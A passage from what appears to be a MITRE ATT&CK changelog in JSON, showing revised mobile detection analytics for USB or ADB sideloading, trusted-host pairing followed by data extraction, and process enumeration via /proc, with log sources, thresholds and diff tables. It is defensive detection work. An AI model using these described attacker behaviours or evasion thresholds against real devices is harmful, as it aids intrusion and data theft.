class=\"diff_add\">&nbsp;of&nbsp;uninstall&nbsp;or&nbsp;package-removal&nbsp;behavior,&nbsp;and&nbsp;(3)&nbsp;disappear</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ance&nbsp;of&nbsp;the&nbsp;application&nbsp;from&nbsp;installed-state&nbsp;inventory&nbsp;or&nbsp;ap</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">p&nbsp;runtime&nbsp;immediately&nbsp;afterward,&nbsp;often&nbsp;with&nbsp;a&nbsp;short-lived&nbsp;fi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nal&nbsp;burst&nbsp;of&nbsp;local&nbsp;cleanup&nbsp;or&nbsp;outbound&nbsp;communication.&nbsp;The&nbsp;de</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">fender&nbsp;observes&nbsp;a&nbsp;causal&nbsp;chain&nbsp;where&nbsp;the&nbsp;application&nbsp;first&nbsp;e</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">stablishes&nbsp;the&nbsp;ability&nbsp;to&nbsp;remove&nbsp;itself,&nbsp;then&nbsp;triggers&nbsp;unins</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tall&nbsp;or&nbsp;deletion,&nbsp;and&nbsp;then&nbsp;vanishes&nbsp;from&nbsp;expected&nbsp;app&nbsp;presen</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ce&nbsp;while&nbsp;device&nbsp;activity&nbsp;continues.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--a69cefd7-02e8-4840-a26e-2ea0b6a95812",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-10 15:33:30.111000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0691#AN1802",
                            "external_id": "AN1802"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1802",
                    "description": "Defender correlates a causal chain where a device transitions into USB debugging or file transfer mode after a physical connection event, followed by application installation, file replication, or execution originating from the USB interface rather than the application store ecosystem.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
                            "name": "android:MDMLog",
                            "channel": "device USB mode change (charging to file transfer / debugging / accessory)"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "ADB_DEBUGGING_ENABLED"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "MobileEDR:telemetry",
                            "channel": "application installed from adb, sideload, or unknown USB source"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "MobileEDR:telemetry",
                            "channel": "large file write originating from /mnt/usb or external mounted storage"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between USB connection state change and application installation."
                        },
                        {
                            "field": "AllowedDeveloperDevices",
                            "description": "List of devices legitimately allowed to use ADB debugging."
                        },
                        {
                            "field": "AllowedSideloadApps",
                            "description": "Approved enterprise apps allowed to install outside Google Play."
                        },
                        {
                            "field": "FileReplicationThreshold",
                            "description": "Volume of file writes from mounted external storage considered suspicious."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between USB connection state change and application installation.\"}, {\"field\": \"AllowedDeveloperDevices\", \"description\": \"List of devices legitimately allowed to use ADB debugging.\"}, {\"field\": \"AllowedSideloadApps\", \"description\": \"Approved enterprise apps allowed to install outside Google Play.\"}, {\"field\": \"FileReplicationThreshold\", \"description\": \"Volume of file writes from mounted external storage considered suspicious.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-10 15:33:30.111000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates a causal chain where a device transitions into USB debugging or file transfer mode after a physical connection event, followed by application installation, file replication, or execution originating from the USB interface rather than the application store ecosystem.\", \"old_value\": \"Mobile security products can often alert the user if their device is vulnerable to known exploits.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"android:MDMLog\", \"channel\": \"device USB mode change (charging to file transfer / debugging / accessory)\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"Sensor Health\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"ADB_DEBUGGING_ENABLED\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application installed from adb, sideload, or unknown USB source\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"large file write originating from /mnt/usb or external mounted storage\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to75__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to75__0\"><a href=\"#difflib_chg_to75__top\">t</a></td><td class=\"diff_header\" id=\"from75_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;security&nbsp;products&nbsp;can&nbsp;often&nbsp;alert&nbsp;the&nbsp;user&nbsp;if&nbsp;their&nbsp;d</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to75__top\">t</a></td><td class=\"diff_header\" id=\"to75_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;a&nbsp;causal&nbsp;chain&nbsp;where&nbsp;a&nbsp;device&nbsp;transition</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">evice&nbsp;is&nbsp;vulnerable&nbsp;to&nbsp;known&nbsp;exploits.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s&nbsp;into&nbsp;USB&nbsp;debugging&nbsp;or&nbsp;file&nbsp;transfer&nbsp;mode&nbsp;after&nbsp;a&nbsp;physical&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">connection&nbsp;event,&nbsp;followed&nbsp;by&nbsp;application&nbsp;installation,&nbsp;file</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;replication,&nbsp;or&nbsp;execution&nbsp;originating&nbsp;from&nbsp;the&nbsp;USB&nbsp;interfac</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;rather&nbsp;than&nbsp;the&nbsp;application&nbsp;store&nbsp;ecosystem.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--a8133527-5402-49e0-a9f1-14ee4fb2dd3f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-10 23:16:21.386000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0691#AN1803",
                            "external_id": "AN1803"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1803",
                    "description": "Defender correlates a chain where a device establishes a new trusted USB host pairing or enters developer/debug configuration state, followed by device data extraction activity, configuration manipulation, or abnormal application behavior shortly after the pairing event.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
                            "name": "iOS:MDMLog",
                            "channel": "Developer Mode enabled, supervised-device restriction changed, or trust-related protected device posture changed"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
                            "name": "iOS:MDMLog",
                            "channel": "Trusted computer / host relationship established or relevant device trust setting changed"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
                            "name": "iOS:MDMLog",
                            "channel": "Device risk, compliance, or security posture changes after trusted host pairing or developer-state transition"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Observed device-service, trust-service, backup/service interaction, or other privileged framework activity associated with physical host access"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "PairingEventWindow",
                            "description": "Time window between trusted host pairing and suspicious device behavior."
                        },
                        {
                            "field": "AllowedTrustedHosts",
                            "description": "Enterprise-authorized computers permitted to pair with managed devices."
                        },
                        {
                            "field": "DeveloperModePolicy",
                            "description": "Whether developer mode is permitted in the organization."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"PairingEventWindow\", \"description\": \"Time window between trusted host pairing and suspicious device behavior.\"}, {\"field\": \"AllowedTrustedHosts\", \"description\": \"Enterprise-authorized computers permitted to pair with managed devices.\"}, {\"field\": \"DeveloperModePolicy\", \"description\": \"Whether developer mode is permitted in the organization.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-10 23:16:21.386000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates a chain where a device establishes a new trusted USB host pairing or enters developer/debug configuration state, followed by device data extraction activity, configuration manipulation, or abnormal application behavior shortly after the pairing event.\", \"old_value\": \"Mobile security products can often alert the user if their device is vulnerable to known exploits.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2\", \"name\": \"iOS:MDMLog\", \"channel\": \"Developer Mode enabled, supervised-device restriction changed, or trust-related protected device posture changed\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"Sensor Health\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"iOS:MDMLog\", \"channel\": \"Trusted computer / host relationship established or relevant device trust setting changed\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"iOS:MDMLog\", \"channel\": \"Device risk, compliance, or security posture changes after trusted host pairing or developer-state transition\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Observed device-service, trust-service, backup/service interaction, or other privileged framework activity associated with physical host access\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to182__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to182__0\"><a href=\"#difflib_chg_to182__top\">t</a></td><td class=\"diff_header\" id=\"from182_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;security&nbsp;products&nbsp;can&nbsp;often&nbsp;alert&nbsp;the&nbsp;user&nbsp;if&nbsp;their&nbsp;d</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to182__top\">t</a></td><td class=\"diff_header\" id=\"to182_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;a&nbsp;chain&nbsp;where&nbsp;a&nbsp;device&nbsp;establishes&nbsp;a&nbsp;new</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">evice&nbsp;is&nbsp;vulnerable&nbsp;to&nbsp;known&nbsp;exploits.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;trusted&nbsp;USB&nbsp;host&nbsp;pairing&nbsp;or&nbsp;enters&nbsp;developer/debug&nbsp;configur</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ation&nbsp;state,&nbsp;followed&nbsp;by&nbsp;device&nbsp;data&nbsp;extraction&nbsp;activity,&nbsp;co</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nfiguration&nbsp;manipulation,&nbsp;or&nbsp;abnormal&nbsp;application&nbsp;behavior&nbsp;s</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">hortly&nbsp;after&nbsp;the&nbsp;pairing&nbsp;event.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--5c5225c4-2d35-431e-830d-ea1cc649c6ba",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-02-23 16:59:44.335000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0692#AN1804",
                            "external_id": "AN1804"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1804",
                    "description": "Defender observes an app/package attempting to enumerate running processes by triggering restricted process visibility mechanisms (e.g., repeated queries for running tasks/services, rapid iteration over process identifiers, or access attempts against /proc entries) that are atypical for its declared function and occur without an associated user-facing diagnostic workflow. The detection relies on correlating (1) OS/API calls or shell/system utility execution indicative of process listing or /proc traversal, (2) app privilege context (root, debug build, device owner/profile owner, accessibility/IME status), (3) background execution state, and (4) optional follow-on behaviors consistent with automated discovery (short bursts of local IPC probes, network beacons immediately after enumeration, or rapid targeting of specific high-value package/process names). The analytic should describe what is observable: repeated enumeration signals + privilege context + timing relationship, not the adversary\u2019s intent.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "repeated queries or dumps related to running tasks/services/process state by same package/UID (e.g., getRunningAppProcesses, running services/task inspection)"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "android:logcat",
                            "channel": "unexpected spikes in fork/exec/app process start events for helper utilities used for enumeration (ps, toybox/toolbox variants) from same UID"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
                            "name": "auditd:SYSCALL",
                            "channel": "attempts to read /proc/* entries at scale (openat/getdents64/readlink) or access denied for /proc traversal; correlate to app UID"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Correlation window for enumeration \u2192 follow-on activity (e.g., 60\u2013600s)."
                        },
                        {
                            "field": "MinEnumerationSignals",
                            "description": "Minimum count of process enumeration indicators to alert (tune by OS build and telemetry quality)."
                        },
                        {
                            "field": "ProcTraversalThreshold",
                            "description": "How many distinct /proc paths opened within the window counts as enumeration (e.g., \u226550)."
                        },
                        {
                            "field": "BackgroundOnly",
                            "description": "If true, require background state to reduce legitimate in-app diagnostics noise."
                        },
                        {
                            "field": "AllowlistedPackages",
                            "description": "Legitimate security/diagnostic/MDM agents expected to inspect processes."
                        },
                        {
                            "field": "HighValueProcessNames",
                            "description": "Process/package names of interest (e.g., security agents, banking apps) used only as enrichment, not a signature."
                        },
                        {
                            "field": "NetworkProbePorts",
                            "description": "Ports considered a \u2018probe/beacon\u2019 after enumeration (53/80/443/etc.)."
                        },
                        {
                            "field": "PrivilegeEscalationGate",
                            "description": "If true, increase severity when enumeration co-occurs with root/debuggable/jailbreak-like posture."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Correlation window for enumeration \\u2192 follow-on activity (e.g., 60\\u2013600s).\"}, {\"field\": \"MinEnumerationSignals\", \"description\": \"Minimum count of process enumeration indicators to alert (tune by OS build and telemetry quality).\"}, {\"field\": \"ProcTraversalThreshold\", \"description\": \"How many distinct /proc paths opened within the window counts as enumeration (e.g., \\u226550).\"}, {\"field\": \"BackgroundOnly\", \"description\": \"If true, require background state to reduce legitimate in-app diagnostics noise.\"}, {\"field\": \"AllowlistedPackages\", \"description\": \"Legitimate security/diagnostic/MDM agents expected to inspect processes.\"}, {\"field\": \"HighValueProcessNames\", \"description\": \"Process/package names of interest (e.g., security agents, banking apps) used only as enrichment, not a signature.\"}, {\"field\": \"NetworkProbePorts\", \"description\": \"Ports considered a \\u2018probe/beacon\\u2019 after enumeration (53/80/443/etc.).\"}, {\"field\": \"PrivilegeEscalationGate\", \"description\": \"If true, increase severity when enumeration co-occurs with root/debuggable/jailbreak-like posture.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-23 16:59:44.335000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes an app/package attempting to enumerate running processes by triggering restricted process visibility mechanisms (e.g., repeated queries for running tasks/services, rapid iteration over process identifiers, or access attempts against /proc entries) that are atypical for its declared function and occur without an associated user-facing diagnostic workflow. The detection relies on correlating (1) OS/API calls or shell/system utility execution indicative of process listing or /proc traversal, (2) app privilege context (root, debug build, device owner/profile owner, accessibility/IME status), (3) background execution state, and (4) optional follow-on behaviors consistent with automated discovery (short bursts of local IPC probes, network beacons immediately after enumeration, or rapid targeting of specific high-value package/process names). The analytic should describe what is observable: repeated enumeration signals + privilege context + timing relationship, not the adversary\\u2019s intent.\", \"old_value\": \"Mobile security products can typically detect rooted devices, which is an indication that Process Discovery is possible. Application vetting could potentially detect when applications attempt to abuse root access or root the system itself. Further, application vetting services could look for attempted usage of legacy process discovery mechanisms, such as the usage of `ps` or inspection of the `/proc` directory.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"repeated queries or dumps related to running tasks/services/process state by same package/UID (e.g., getRunningAppProcesses, running services/task inspection)\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"android:logcat\", \"channel\": \"unexpected spikes in fork/exec/app process start events for helper utilities used for enumeration (ps, toybox/toolbox variants) from same UID\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71\", \"name\": \"auditd:SYSCALL\", \"channel\": \"attempts to read /proc/* entries at scale (openat/getdents64/readlink) or access denied for /proc traversal; correlate to app UID\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to202__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to202__0\"><a href=\"#difflib_chg_to202__top\">t</a></td><td class=\"diff_header\" id=\"from202_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;security&nbsp;products&nbsp;can&nbsp;typically&nbsp;detect&nbsp;rooted&nbsp;devices</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to202__top\">t</a></td><td class=\"diff_header\" id=\"to202_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;an&nbsp;app/package&nbsp;attempting&nbsp;to&nbsp;enumerate&nbsp;run</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">,&nbsp;which&nbsp;is&nbsp;an&nbsp;indication&nbsp;that&nbsp;Process&nbsp;Discovery&nbsp;is&nbsp;possible.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ning&nbsp;processes&nbsp;by&nbsp;triggering&nbsp;restricted&nbsp;process&nbsp;visibility&nbsp;m</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;Application&nbsp;vetting&nbsp;could&nbsp;potentially&nbsp;detect&nbsp;when&nbsp;applicati</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">echanisms&nbsp;(e.g.,&nbsp;repeated&nbsp;queries&nbsp;for&nbsp;running&nbsp;tasks/services</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ons&nbsp;attempt&nbsp;to&nbsp;abuse&nbsp;root&nbsp;access&nbsp;or&nbsp;root&nbsp;the&nbsp;system&nbsp;itself.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">,&nbsp;rapid&nbsp;iteration&nbsp;over&nbsp;process&nbsp;identifiers,&nbsp;or&nbsp;access&nbsp;attemp</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Further,&nbsp;application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;attempt</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ts&nbsp;against&nbsp;/proc&nbsp;entries)&nbsp;that&nbsp;are&nbsp;atypical&nbsp;for&nbsp;its&nbsp;declared</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ed&nbsp;usage&nbsp;of&nbsp;legacy&nbsp;process&nbsp;discovery&nbsp;mechanisms,&nbsp;such&nbsp;as&nbsp;the</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;function&nbsp;and&nbsp;occur&nbsp;without&nbsp;an&nbsp;associated&nbsp;user-facing&nbsp;diagno</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;usage&nbsp;of&nbsp;`ps`&nbsp;or&nbsp;inspection&nbsp;of&nbsp;the&nbsp;`/proc`&nbsp;directory.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">stic&nbsp;workflow.&nbsp;The&nbsp;detection&nbsp;relies&nbsp;on&nbsp;correlating&nbsp;(1)&nbsp;OS/AP</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">I&nbsp;calls&nbsp;or&nbsp;shell/system&nbsp;utility&nbsp;execution&nbsp;indicative&nbsp;of&nbsp;proc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td 